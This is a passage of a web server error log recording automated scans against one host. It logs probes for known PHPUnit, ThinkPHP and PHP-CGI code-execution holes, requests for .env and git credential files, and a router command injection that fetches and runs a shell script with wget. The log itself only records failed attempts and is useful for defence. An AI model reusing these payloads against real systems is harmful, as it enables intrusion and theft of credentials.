HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:28 [error] 401#401: *286587 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:32 [error] 401#401: *286587 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:33 [error] 401#401: *286587 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:40 [error] 401#401: *286587 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:41 [error] 401#401: *286587 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:42 [error] 401#401: *286587 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:44 [error] 401#401: *286587 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:44 [error] 401#401: *286587 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:45 [error] 401#401: *286587 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:46 [error] 401#401: *286587 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:46 [error] 401#401: *286588 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.83.208" +2026/01/18 13:08:55 [error] 401#401: *286587 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:10:49 [error] 401#401: *286592 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "91.82.83.208" +2026/01/18 13:37:24 [error] 401#401: *286616 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:51:55 [error] 401#401: *286630 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 14:18:44 [error] 402#402: *286659 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 14:18:44 [error] 402#402: *286660 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 14:27:09 [error] 402#402: *286669 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 14:40:37 [error] 402#402: *286699 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 14:54:44 [error] 402#402: *286711 open() "/var/www/html/.env" failed (2: No such file or directory), client: 91.244.197.69, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 15:29:20 [error] 403#403: *286742 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:21 [error] 403#403: *286742 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:23 [error] 403#403: *286742 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:23 [error] 403#403: *286742 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:24 [error] 403#403: *286742 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:25 [error] 403#403: *286742 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:26 [error] 403#403: *286742 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:27 [error] 403#403: *286742 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:27 [error] 403#403: *286742 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:28 [error] 403#403: *286742 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:29 [error] 403#403: *286742 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:29 [error] 403#403: *286742 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:30 [error] 403#403: *286742 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:31 [error] 403#403: *286742 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:32 [error] 403#403: *286742 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:33 [error] 403#403: *286742 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:34 [error] 403#403: *286742 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:35 [error] 403#403: *286742 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:36 [error] 403#403: *286742 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:36 [error] 403#403: *286742 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:37 [error] 403#403: *286742 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:38 [error] 403#403: *286742 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:39 [error] 403#403: *286742 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:40 [error] 403#403: *286742 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:41 [error] 403#403: *286742 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:42 [error] 403#403: *286742 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:43 [error] 403#403: *286742 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:44 [error] 403#403: *286742 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:45 [error] 403#403: *286742 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:46 [error] 403#403: *286742 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:47 [error] 403#403: *286742 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:48 [error] 403#403: *286742 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:49 [error] 403#403: *286742 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:49 [error] 403#403: *286742 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:50 [error] 403#403: *286742 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:51 [error] 403#403: *286742 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:52 [error] 403#403: *286742 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:53 [error] 403#403: *286742 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:54 [error] 403#403: *286742 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:54 [error] 403#403: *286742 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:29:57 [error] 403#403: *286742 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 68.183.234.194, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 15:33:09 [error] 403#403: *286747 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 23.176.184.61, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/18 15:52:51 [error] 403#403: *286765 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 16:06:08 [error] 403#403: *286780 open() "/var/www/html/_next" failed (2: No such file or directory), client: 82.23.183.131, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 16:06:32 [error] 403#403: *286781 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 82.23.183.131, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 16:06:48 [error] 403#403: *286782 open() "/var/www/html/app" failed (2: No such file or directory), client: 82.23.183.131, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 16:07:00 [error] 403#403: *286783 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 82.23.183.131, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 16:42:04 [error] 400#400: *286822 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 17:09:57 [error] 410#410: *286847 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:09:58 [error] 407#407: *286848 open() "/var/www/html/.env-dev.conf" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-dev.conf HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:09:58 [error] 407#407: *286849 open() "/var/www/html/.env-devtools" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-devtools HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:09:59 [error] 407#407: *286850 open() "/var/www/html/.env-dump.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-dump.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:00 [error] 407#407: *286851 open() "/var/www/html/.env-dump.sql" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-dump.sql HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:00 [error] 407#407: *286852 open() "/var/www/html/.env-firewall" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-firewall HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:00 [error] 407#407: *286853 open() "/var/www/html/.env-fixtures" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-fixtures HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:00 [error] 407#407: *286854 open() "/var/www/html/.env-frontend" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-frontend HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:00 [error] 407#407: *286855 open() "/var/www/html/.env-heapdump" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-heapdump HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:00 [error] 407#407: *286856 open() "/var/www/html/.env-hits.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-hits.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286857 open() "/var/www/html/.env-html.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-html.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286858 open() "/var/www/html/.env-http.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-http.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286859 open() "/var/www/html/.env-identity" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-identity HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286860 open() "/var/www/html/.env-iis.conf" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-iis.conf HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286861 open() "/var/www/html/.env-info.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-info.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286862 open() "/var/www/html/.env-info.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-info.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 407#407: *286863 open() "/var/www/html/.env-json.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-json.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:01 [error] 408#408: *286864 open() "/var/www/html/.env-keycloak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-keycloak HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:02 [error] 408#408: *286865 open() "/var/www/html/.env-keys.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-keys.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:02 [error] 408#408: *286866 open() "/var/www/html/.env-logs.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-logs.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:02 [error] 408#408: *286868 open() "/var/www/html/.env-meta.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-meta.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:03 [error] 408#408: *286869 open() "/var/www/html/.env-mongoose" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-mongoose HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:03 [error] 408#408: *286870 open() "/var/www/html/.env-node.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-node.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:03 [error] 408#408: *286871 open() "/var/www/html/.env-post.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-post.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:03 [error] 408#408: *286872 open() "/var/www/html/.env-prod.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-prod.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:03 [error] 408#408: *286873 open() "/var/www/html/.env-prod.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-prod.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:04 [error] 408#408: *286874 open() "/var/www/html/.env-s3-creds" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-s3-creds HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:04 [error] 408#408: *286875 open() "/var/www/html/.env-scan.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-scan.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:04 [error] 408#408: *286876 open() "/var/www/html/.env-mail.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-mail.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:10:04 [error] 408#408: *286877 open() "/var/www/html/.env-selenium" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-selenium HTTP/1.1", host: "91.82.83.208" +2026/01/18 17:46:07 [error] 409#409: *286929 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 104.248.74.23, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/admin/login.asp" +2026/01/18 18:31:13 [error] 407#407: *288459 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:13 [error] 408#408: *288460 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:13 [error] 408#408: *288461 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:13 [error] 408#408: *288462 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:13 [error] 408#408: *288463 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:14 [error] 408#408: *288464 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:14 [error] 